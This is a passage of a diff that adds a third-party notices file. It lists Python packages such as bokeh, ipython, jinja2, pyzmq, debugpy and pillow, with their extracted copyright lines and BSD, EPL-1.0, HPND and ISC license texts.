+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+webencodings 0.5.1 - BSD-2-Clause
+
+
+Copyright 2012 by Simon Sapin
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+backcall 0.2.0 - BSD-2-Clause AND BSD-3-Clause
+
+
+Copyright (c) 2013 Aaron Iles
+copyright u'2014, Thomas Kluyver
+Copyright (c) 2014, Thomas Kluyver
+Copyright (c) 2013 The IPython Development Team
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+bokeh 2.4.2 - BSD-2-Clause AND BSD-3-Clause
+
+
+(c) 2011 Gary Court.
+Copyright 2011 Gary Court.
+Copyright 2019 Google LLC.
+(c) 2009-2016 Michael Leibman
+Copyright 2010-2015 Mike Bostock
+Copyright (c) 2010 Three Dub Media
+Copyright (c) 2016 Jorik Tangelder
+Copyright 2011 The Closure Compiler
+Copyright (c) Microsoft Corporation.
+Copyright (c) 2014-2016, Jon Schlinkert.
+Copyright (c) 2014-2017, Jon Schlinkert.
+Copyright (c) 2012 - 2021, Anaconda, Inc.
+(c) <a href https://cartodb.com/attributions'>
+Copyright JS Foundation and other contributors
+Copyright (c) 2017, Battelle Memorial Institute
+Copyright (c) 2014 Ivan Nikulin <ifaaan@gmail.com>
+Copyright 2011 Mozilla Foundation and contributors
+Copyright 2014 Mozilla Foundation and contributors
+Copyright OpenJS Foundation and other contributors
+Copyright jQuery Foundation and other contributors
+Copyright Joyent, Inc. and other Node contributors.
+Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh
+(c) <a href https://www.openstreetmap.org/copyright'>
+Copyright (c) 2012-2017 Kirollos Risk (http://kiro.me)
+Copyright 2012 (c) Mihai Bazon <mihai.bazon@gmail.com>
+Copyright 2009-2011 Mozilla Foundation and contributors
+Copyright (c) 2013 Yusuke Suzuki <utatane.tea@gmail.com>
+Copyright (c) 2014 Yusuke Suzuki <utatane.tea@gmail.com>
+Copyright (c) 2012 Ariya Hidayat <ariya.hidayat@gmail.com>
+(c) 2019 Josh Johnson https://github.com/jshjohnson/Choices
+Copyright (c) 2012-2013 Yusuke Suzuki <utatane.tea@gmail.com>
+Copyright (c) 2013-2014 Yusuke Suzuki <utatane.tea@gmail.com>
+Copyright 2012-2015 The Dojo Foundation <http://dojofoundation.org/>
+Copyright (c) 2014 Yehuda Katz, Tom Dale, Stefan Penner and contributors
+(c) <a href http://downloads.esri.com/ArcGISOnline/docs/tou_summary.pdf'>
+Copyright OpenJS Foundation and other contributors <https://openjsf.org/>
+Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
+(c) <a href https://foundation.wikimedia.org/wiki/Maps_Terms_of_Use'> Wikimedia Maps
+Copyright 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
+(c) 2009-2013 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors Underscore
+(c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors Underscore
+(c) 2009-2013 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors // Underscore
+(c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors // Underscore
+Copyright (c) 2006-2009 Hampton Catlin, Natalie Weizenbaum, and Chris Eppstein // http://sass-lang.com
+Coproduc Cros , Cu CupCa Dagge De Delt , Diamon Differential DotEqua DoubleDo DoubleRightTe , DoubleVerticalBa DownArro DownLeftVecto DownRightVecto DownTe , Downarro Elemen EqualTild Equilibriu Exist , Exponential FilledVerySmallSquar ForAl Gamm
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+cycler 0.11.0 - BSD-2-Clause AND BSD-3-Clause
+
+
+copyright 2015, Matplotlib Developers
+Copyright (c) 2015, matplotlib project
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+ipython 7.31.0 - BSD-2-Clause AND BSD-3-Clause
+
+
+(c) Python and NumPy
+Copyright (c) 2000 Thomas Heller
+Copyright (c) 2010 Doug Hellmann.
+Portions (c) 2009 by Robert Kern.
+copyright 2007 by Armin Ronacher.
+Copyright (c) 2014, Jonathan Slenders
+Copyright (c) 2015, Jonathan Slenders
+copyright The IPython Development Team
+Copyright (c) IPython Development Team.
+Copyright (c) 2011, IPython Development Team
+Copyright (c) 2012 IPython Development Team.
+Copyright (c) 2008, IPython Development Team.
+Copyright (c) 2012, IPython Development Team.
+Copyright (c) 2008 Pauli Virtanen <pav@iki.fi>
+Copyright (c) 2008 The IPython Development Team
+Copyright (c) 2011 The IPython Development Team
+Copyright (c) 2013 The IPython Development Team
+Copyright (c) 2012 The IPython Development Team.
+Copyright (c) 2012- The IPython Development Team
+Copyright (c) 2018 The IPython Development Team.
+Copyright (c) 2011, the IPython Development Team.
+Copyright (c) 2012, the IPython Development Team.
+Copyright (c) 2013, the IPython Development Team.
+Copyright (c) 2008-2011, IPython Development Team.
+Copyright (c) 2010-2011, IPython Development Team.
+Copyright (c) 2001 Janko Hauser <jhauser@zscout.de>
+Copyright (c) 2001, Janko Hauser <jhauser@zscout.de>
+Copyright (c) 2008-2011 The IPython Development Team
+Copyright (c) 2008-2012 The IPython Development Team
+Copyright (c) 2008-Present, IPython Development Team
+Copyright (c) 2009-2011 The IPython Development Team
+Copyright (c) 2010-2011 The IPython Development Team.
+Copyright (c) 2001 Nathaniel Gray <n8gray@caltech.edu>
+Copyright (c) 2001 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2001, Nathaniel Gray <n8gray@caltech.edu>
+Copyright (c) 2005 Fernando Perez. <fperez@colorado.edu>
+Copyright (c) 2016 The IPython Team <ipython-dev@scipy.org>
+Copyright (c) 2001-2004 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2001-2005 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2001-2006 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2005-2006 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2001 Python Software Foundation, www.python.org
+Copyright (c) 2001-2007 Fernando Perez. <fperez@colorado.edu>
+Copyright (c) 2002-2006 Fernando Perez. <fperez@colorado.edu>
+Copyright (c) 2005-2006 Fernando Perez. <fperez@colorado.edu>
+Copyright (c) 2001, Fernando Perez <fernando.perez@colorado.edu>
+Copyright (c) 2005 Jorgen Stenarson <jorgen.stenarson@bostream.nu>
+Copyright (c) 2001-2007, Fernando Perez <fernando.perez@colorado.edu>
+Copyright (c) 2005-2006 Fernando Perez. <Fernando.Perez@colorado.edu>
+Copyright (c) 2005 Fernando Perez <fperez@colorado.edu> Brian E Granger <ellisonbg@gmail.com> Benjamin Ragan-Kelley <benjaminrk@gmail.com>
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+ipywidgets 7.6.5 - BSD-2-Clause AND BSD-3-Clause
+
+
+copyright 2017 Project
+Copyright (c) IPython Development Team.
+Copyright (c) Jupyter Development Team.
+Copyright (c) 2015 Project Jupyter Contributors
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+jinja2 3.0.3 - BSD-2-Clause AND BSD-3-Clause
+
+
+Copyright 2007 Pallets
+copyright 2007 Pallets
+(c) Copyright 2008 by <a href http://domain.invalid/'>
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+networkx 2.6.3 - BSD-2-Clause AND BSD-3-Clause
+
+
+Copyright (c) 2015 - Thomson Licensing, SAS
+Copyright 2011 Alex Levenson <alex@isnotinvain.com>
+Copyright 2011 Reya Group <http://www.reyagroup.com>
+copyright f'2004- date.today().year, NetworkX Developers
+Copyright 2011 Diederik van Liere <diederik.vanliere@rotman.utoronto.ca>
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+notebook 6.4.6 - BSD-2-Clause AND BSD-3-Clause
+
+
+Copyright (c) 2014
+Copyright Dave Gandy 2016.
+Copyright (c) 2012 Google Inc.
+copyright (c) by Lennart Ochel
+copyright AtomicPages LLC 2014
+Copyright (c) 2017 ORGANIZATION
+Copyright 2014-2019 Volker Sorge
+Copyright 2011-2019 Twitter, Inc.
+Copyright 2012-2013 Ulrich Sossou
+Copyright (c) 2011 Fabrice Bellard
+Copyright (c) 2014, Facebook, Inc.
+Copyright (c) Alexandru Marasteanu
+copyright (c) 2015 by Calin Barbat
+Copyright (c) 2019 RunningCoder.org
+Copyright 2007-2012 Steven Levithan
+Copyright (c) 2007 Cybozu Labs, Inc.
+Copyright (c) 2015-2019 Martin Hensel
+copyright (c) HicknHack Software Gmbh
+Copyright (c) IPython Development Team.
+Copyright (c) Jupyter Development Team.
+(c) JS Foundation and other contributors
+Copyright (c) 2014-2017, Jon Schlinkert.
+Copyright (c) 2013-present, Facebook, Inc.
+Copyright (c) 2011 by MarkLogic Corporation
+copyright (c) 2015 by Grzegorz Mazur Loosely
+copyright (c) 2016 Jared Dean, SAS Institute
+copyright (c) by Marijn Haverbeke and others
+Copyright (c) 2009-2018 The MathJax Consortium
+Copyright (c) 2010-2018 The MathJax Consortium
+Copyright (c) 2011-2015 The MathJax Consortium
+Copyright (c) 2015-, Jupyter Development Team.
+Copyright (c) 2001-2015, IPython Development Team
+copyright 2015, Jupyter Team, https://jupyter.org
+Copyright (c) 2008-2015, IPython Development Team.
+Copyright jQuery Foundation and other contributors.
+(c) Ivan Sagalaev <Maniac@SoftwareManiacs.Org> Adapted from GitHub
+Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)
+Copyright (c) 2012-2013, Christopher Jeffrey (MIT License) https://github.com/chjj/term.js
+(c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors Underscore
+Copyright (c) 2011-2018, Christopher Jeffrey. (MIT Licensed) https://github.com/markedjs/marked
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+oauthlib 3.1.1 - BSD-2-Clause AND BSD-3-Clause
+
+
+(c) Access Token
+(c) Redirection URI
+Copyright (c) 2019 The OAuthlib Community
+copyright (c) 2019 by The OAuthlib Community
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pandocfilters 1.5.0 - BSD-2-Clause AND BSD-3-Clause
+
+
+Copyright (c) 2013 John MacFarlane
+Copyright (c) 2013, John MacFarlane
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pycparser 2.21 - BSD-2-Clause AND BSD-3-Clause
+
+
+Copyright (c) 2001-2017 David M. Beazley
+David Beazley (http://www.dabeaz.com) Copyright (c) 2017
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+testpath 0.5.0 - BSD-2-Clause AND BSD-3-Clause
+
+
+copyright 2015, Jupyter Development Team
+Copyright (c) 2015, The Jupyter Development Team
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+widgetsnbextension 3.5.2 - BSD-2-Clause AND BSD-3-Clause
+
+
+Copyright (c) 2014 Dan Le
+Copyright (c) 2014 Adam Krebs
+Copyright (c) 2014-2017, PhosphorJS
+Copyright (c) 2014-2019, PhosphorJS
+Copyright (c) Microsoft Corporation.
+(c) 2015 Adam Krebs, Jimmy Yuen Ho Wong
+Copyright (c) IPython Development Team.
+Copyright (c) Jupyter Development Team.
+Copyright JS Foundation and other contributors
+Copyright (c) 2015 Project Jupyter Contributors
+Copyright OpenJS Foundation and other contributors
+Copyright jQuery Foundation and other contributors
+Copyright (c) 2010-2015 Jeremy Ashkenas, DocumentCloud
+(c) 2010-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors Backbone
+
+BSD-2-Clause AND BSD-3-Clause
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pyzmq 22.3.0 - BSD-2-Clause AND BSD-3-Clause AND GPL-2.0-or-later AND LGPL-3.0-only AND NOASSERTION
+
+
+Copyright (c) 2016
+Copyright (c) 2018
+Copyright (c) 2019
+(c) PyZMQ Developers
+(c) iMatix Corporation
+Copyright (c) 2007-2016
+Copyright (c) 2007-2017
+Copyright (c) 2007-2018
+Copyright (c) 2007-2019
+Copyright (c) 2016-2017
+Copyright 2009 Facebook
+Copyright 2010 Facebook
+Copyright 2011 Facebook
+Copyright (c) 2010 Justin Riley
+Copyright (c) PyZMQ Developers.
+Copyright (c) 2010 Brian Granger
+Copyright (c) 2010 Lisandro Dalcin
+Copyright (c) 2010 The IPython Team
+Copyright (c) Stef van der Struijk.
+Copyright (c) 2011- PyZMQ Developers
+Copyright (c) 2011-2012 Travis Cline
+Copyright (c) 2012 Godefroid Chapelle
+Copyright (c) PyZMQ Development Team.
+Copyright (c) 2010 Andrew Gwozdziewycz
+Copyright (c) 2012 The ZeroMQ Authors.
+Copyright (c) 2007-2010 iMatix Corporation
+Copyright (c) 2010 Brian Granger, Fernando Perez
+Copyright (c) 2010-2011 IPython Development Team
+Copyright (c) 2010 Brian Granger, Min Ragan-Kelley
+Copyright (c) 2010 Min Ragan-Kelley, Brian Granger
+copyright u'Brian E. Granger & Min Ragan-Kelley. OMQ
+Copyright (c) 2010 Brian E. Granger & Min Ragan-Kelley
+Copyright (c) 2013 Brian E. Granger & Min Ragan-Kelley
+Copyright (c) 2010-2012 Brian Granger, Min Ragan-Kelley
+Copyright 2012-2018, Bert Belder <bertbelder@gmail.com>
+Copyright (c) 2009-2012, Brian Granger, Min Ragan-Kelley
+Copyright (c) 2010-2011 Brian E. Granger & Min Ragan-Kelley
+Copyright (c) 2003-2007 Robey Pointer <robeypointer@gmail.com>
+Copyright (c) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+
+BSD-2-Clause AND BSD-3-Clause AND GPL-2.0-or-later AND LGPL-3.0-only AND NOASSERTION
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+jupyterlab-pygments 0.1.2 - BSD-3-Clause
+
+
+Copyright (c) Jupyter Development Team.
+Copyright (c) 2015 Project Jupyter Contributors
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+   3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+matplotlib-inline 0.1.3 - BSD-3-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+   3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+debugpy 1.5.1 - EPL-1.0
+
+
+
+Eclipse Public License - v 1.0
+
+THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE PUBLIC LICENSE ("AGREEMENT"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM CONSTITUTES RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT.
+
+   1. DEFINITIONS
+
+   "Contribution" means:
+
+      a) in the case of the initial Contributor, the initial code and documentation distributed under this Agreement, and
+
+      b) in the case of each subsequent Contributor:
+
+         i) changes to the Program, and
+
+         ii) additions to the Program;
+
+         where such changes and/or additions to the Program originate from and are distributed by that particular Contributor. A Contribution 'originates' from a Contributor if it was added to the Program by such Contributor itself or anyone acting on such Contributor's behalf. Contributions do not include additions to the Program which: (i) are separate modules of software distributed in conjunction with the Program under their own license agreement, and (ii) are not derivative works of the Program.
+
+   "Contributor" means any person or entity that distributes the Program.
+
+   "Licensed Patents" mean patent claims licensable by a Contributor which are necessarily infringed by the use or sale of its Contribution alone or when combined with the Program.
+
+   "Program" means the Contributions distributed in accordance with this Agreement.
+
+   "Recipient" means anyone who receives the Program under this Agreement, including all Contributors.
+
+   2. GRANT OF RIGHTS
+
+      a) Subject to the terms of this Agreement, each Contributor hereby grants Recipient a non-exclusive, worldwide, royalty-free copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, distribute and sublicense the Contribution of such Contributor, if any, and such derivative works, in source code and object code form.
+
+      b) Subject to the terms of this Agreement, each Contributor hereby grants Recipient a non-exclusive, worldwide, royalty-free patent license under Licensed Patents to make, use, sell, offer to sell, import and otherwise transfer the Contribution of such Contributor, if any, in source code and object code form. This patent license shall apply to the combination of the Contribution and the Program if, at the time the Contribution is added by the Contributor, such addition of the Contribution causes such combination to be covered by the Licensed Patents. The patent license shall not apply to any other combinations which include the Contribution. No hardware per se is licensed hereunder.
+
+      c) Recipient understands that although each Contributor grants the licenses to its Contributions set forth herein, no assurances are provided by any Contributor that the Program does not infringe the patent or other intellectual property rights of any other entity. Each Contributor disclaims any liability to Recipient for claims brought by any other entity based on infringement of intellectual property rights or otherwise. As a condition to exercising the rights and licenses granted hereunder, each Recipient hereby assumes sole responsibility to secure any other intellectual property rights needed, if any. For example, if a third party patent license is required to allow Recipient to distribute the Program, it is Recipient's responsibility to acquire that license before distributing the Program.
+
+      d) Each Contributor represents that to its knowledge it has sufficient copyright rights in its Contribution, if any, to grant the copyright license set forth in this Agreement.
+
+   3. REQUIREMENTS
+
+   A Contributor may choose to distribute the Program in object code form under its own license agreement, provided that:
+
+      a) it complies with the terms and conditions of this Agreement; and
+
+      b) its license agreement:
+
+         i) effectively disclaims on behalf of all Contributors all warranties and conditions, express and implied, including warranties or conditions of title and non-infringement, and implied warranties or conditions of merchantability and fitness for a particular purpose;
+
+         ii) effectively excludes on behalf of all Contributors all liability for damages, including direct, indirect, special, incidental and consequential damages, such as lost profits;
+
+         iii) states that any provisions which differ from this Agreement are offered by that Contributor alone and not by any other party; and
+
+         iv) states that source code for the Program is available from such Contributor, and informs licensees how to obtain it in a reasonable manner on or through a medium customarily used for software exchange.
+
+   When the Program is made available in source code form:
+
+      a) it must be made available under this Agreement; and
+
+      b) a copy of this Agreement must be included with each copy of the Program.
+
+      Contributors may not remove or alter any copyright notices contained within the Program.
+
+   Each Contributor must identify itself as the originator of its Contribution, if any, in a manner that reasonably allows subsequent Recipients to identify the originator of the Contribution.
+
+   4. COMMERCIAL DISTRIBUTION
+
+   Commercial distributors of software may accept certain responsibilities with respect to end users, business partners and the like. While this license is intended to facilitate the commercial use of the Program, the Contributor who includes the Program in a commercial product offering should do so in a manner which does not create potential liability for other Contributors. Therefore, if a Contributor includes the Program in a commercial product offering, such Contributor ("Commercial Contributor") hereby agrees to defend and indemnify every other Contributor ("Indemnified Contributor") against any losses, damages and costs (collectively "Losses") arising from claims, lawsuits and other legal actions brought by a third party against the Indemnified Contributor to the extent caused by the acts or omissions of such Commercial Contributor in connection with its distribution of the Program in a commercial product offering. The obligations in this section do not apply to any claims or Losses relating to any actual or alleged intellectual property infringement. In order to qualify, an Indemnified Contributor must: a) promptly notify the Commercial Contributor in writing of such claim, and b) allow the Commercial Contributor to control, and cooperate with the Commercial Contributor in, the defense and any related settlement negotiations. The Indemnified Contributor may participate in any such claim at its own expense.
+
+   For example, a Contributor might include the Program in a commercial product offering, Product X. That Contributor is then a Commercial Contributor. If that Commercial Contributor then makes performance claims, or offers warranties related to Product X, those performance claims and warranties are such Commercial Contributor's responsibility alone. Under this section, the Commercial Contributor would have to defend claims against the other Contributors related to those performance claims and warranties, and if a court requires any other Contributor to pay any damages as a result, the Commercial Contributor must pay those damages.
+
+   5. NO WARRANTY
+
+   EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Each Recipient is solely responsible for determining the appropriateness of using and distributing the Program and assumes all risks associated with its exercise of rights under this Agreement, including but not limited to the risks and costs of program errors, compliance with applicable laws, damage to or loss of data, programs or equipment, and unavailability or interruption of operations.
+
+   6. DISCLAIMER OF LIABILITY
+
+   EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY CONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION LOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
+
+   7. GENERAL
+
+   If any provision of this Agreement is invalid or unenforceable under applicable law, it shall not affect the validity or enforceability of the remainder of the terms of this Agreement, and without further action by the parties hereto, such provision shall be reformed to the minimum extent necessary to make such provision valid and enforceable.
+
+   If Recipient institutes patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Program itself (excluding combinations of the Program with other software or hardware) infringes such Recipient's patent(s), then such Recipient's rights granted under Section 2(b) shall terminate as of the date such litigation is filed.
+
+   All Recipient's rights under this Agreement shall terminate if it fails to comply with any of the material terms or conditions of this Agreement and does not cure such failure in a reasonable period of time after becoming aware of such noncompliance. If all Recipient's rights under this Agreement terminate, Recipient agrees to cease use and distribution of the Program as soon as reasonably practicable. However, Recipient's obligations under this Agreement and any licenses granted by Recipient relating to the Program shall continue and survive.
+
+   Everyone is permitted to copy and distribute copies of this Agreement, but in order to avoid inconsistency the Agreement is copyrighted and may only be modified in the following manner. The Agreement Steward reserves the right to publish new versions (including revisions) of this Agreement from time to time. No one other than the Agreement Steward has the right to modify this Agreement. The Eclipse Foundation is the initial Agreement Steward. The Eclipse Foundation may assign the responsibility to serve as the Agreement Steward to a suitable separate entity. Each new version of the Agreement will be given a distinguishing version number. The Program (including Contributions) may always be distributed subject to the version of the Agreement under which it was received. In addition, after a new version of the Agreement is published, Contributor may elect to distribute the Program (including its Contributions) under the new version. Except as expressly stated in Sections 2(a) and 2(b) above, Recipient receives no rights or licenses to the intellectual property of any Contributor under this Agreement, whether expressly, by implication, estoppel or otherwise. All rights in the Program not expressly granted under this Agreement are reserved.
+
+   This Agreement is governed by the laws of the State of New York and the intellectual property laws of the United States of America. No party to this Agreement will bring a legal action under this Agreement more than one year after the cause of action arose. Each party waives its rights to a jury trial in any resulting litigation.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pillow 9.0.0 - HPND
+
+
+
+Historical Permission Notice and Disclaimer
+
+<copyright notice>
+
+Permission to use, copy, modify and distribute this software and its documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appear in all copies , and that both that the copyright notice and this permission notice appear in supporting documentation , and that the name of <copyright holder> <or related entities> not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission . <copyright holder> makes no representations about the suitability of this software for any purpose. It is provided "as is" without express or implied warranty. <copyright holder> DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS . IN NO EVENT SHALL <copyright holder> BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+dnspython 2.0.0 - ISC
+
+
+
+ISC License
+
+Copyright (c) 2004-2010 by Internet Systems Consortium, Inc. ("ISC")
+
+Copyright (c) 1995-2003 by Internet Software Consortium
+
+Permission to use, copy, modify, and /or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies.
+
